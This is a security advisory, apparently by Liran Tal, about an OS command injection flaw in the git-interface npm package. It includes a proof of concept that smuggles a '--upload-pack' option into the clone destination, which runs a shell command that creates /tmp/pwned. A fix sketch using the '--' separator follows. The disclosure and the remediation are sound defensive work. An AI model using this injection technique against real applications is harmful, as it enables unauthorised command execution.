git-interface describes itself as an "Interface to work with a git repository in node.js".
I’m reporting an OS Command Injection vulnerability in the git-interface npm package. The API may be abused if user input is able to provide a valid directory on disk and supply the destination directory to clone a repository to.
Install [email protected], which is the latest.
Run the following code, with the following precondition: the /tmp/new directory needs to exist (it doesn’t need to be a .git initialized directory though), so you could provide a predictable path such as /usr/src:
const { Git } = require('git-interface');
const git = new Git({
  dir: '/tmp/new' // default path is current directory
});
git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');
Observe a new file created: /tmp/pwned
Use the shell -- notation as a suffix of the supported command-line arguments (if any), to make sure that input passed to the git command is treated as positional arguments rather than command-line arguments. For example: git clone -- <path> <destination> would prevent path and destination from being interpreted as command-line arguments for the git command.
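The recommendation above, sketched as an added example (this is not git-interface's code). The function names are hypothetical, and the option check is a simplified model of git's argument parsing, assuming git is spawned with an argument array rather than through a shell:

```javascript
// Added example, not git-interface code. All function names are hypothetical.

// Simplified model of git's option parsing: any argument starting with "-"
// is read as an option, wherever it appears, until a bare "--" is reached.
function optionLikeArgs(argv) {
  const end = argv.indexOf('--');
  const scanned = end === -1 ? argv : argv.slice(0, end);
  return scanned.filter((arg) => arg.startsWith('-'));
}

// "Before": caller-supplied values sit where git still parses options.
function unsafeCloneArgv(repository, dest) {
  return ['clone', repository, dest];
}

// "After": fixed options (none here) first, then "--", then caller values,
// so git treats both values as positional arguments.
function safeCloneArgv(repository, dest) {
  for (const [name, value] of [['repository', repository], ['dest', dest]]) {
    if (typeof value !== 'string' || value.length === 0) {
      throw new TypeError(`${name} must be a non-empty string`);
    }
  }
  return ['clone', '--', repository, dest];
}

// Runs git with an argv array and no shell. Defined for completeness;
// it is not called below, so this file runs without git installed.
function safeClone(repository, dest, cwd) {
  const { execFile } = require('child_process');
  return new Promise((resolve, reject) => {
    execFile('git', safeCloneArgv(repository, dest), { cwd }, (err, stdout) =>
      (err ? reject(err) : resolve(stdout)));
  });
}

// Constructed input: the two values from the proof of concept above.
const poc = ['file:///tmp/new', '--upload-pack=echo>/tmp/pwned'];
console.log(optionLikeArgs(unsafeCloneArgv(...poc))); // [ '--upload-pack=echo>/tmp/pwned' ]
console.log(optionLikeArgs(safeCloneArgv(...poc)));   // []
```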
Liran Tal